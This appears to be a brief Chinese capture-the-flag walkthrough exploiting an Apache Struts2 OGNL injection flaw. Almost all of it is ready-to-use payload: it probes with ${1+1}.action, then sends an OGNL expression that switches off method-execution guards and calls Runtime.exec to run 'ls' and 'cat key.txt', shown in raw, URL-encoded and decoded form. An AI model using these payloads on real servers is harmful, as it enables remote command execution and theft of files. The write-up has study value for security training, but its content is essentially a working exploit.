1. 输入/${1+1}.action,发现表达式被执行,证明存在漏洞
2.写入exp
${
#context[‘xwork.methodaccessor.denymethodexecution’]=false,
#m=#_memberaccess.getclass().getdeclaredfield(‘allowstaticmethodaccess’),
#m.setaccessible(true),
#m.set(#_memberaccess,true),
#q=@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(‘ls’).getinputstream()),
#q
}.action
3.执行失败,对exp进行url转码后再次写入
%24%7b%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%3d@org.apache.commons.io.ioutils@tostring%28@java.lang.runtime@getruntime%28%29.exec%28%27ls%27%29.getinputstream%28%29%29%2c%23q%7d.action
4.拿key
%24%7b
%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%3d@org.apache.commons.io.ioutils@tostring%28@java.lang.runtime@getruntime%28%29.exec%28%27cat%20key.txt%27%29.getinputstream%28%29%29%2c%23q%7d.action
payload
/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action
解码后
/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat key.txt').getInputStream()),#q}.action

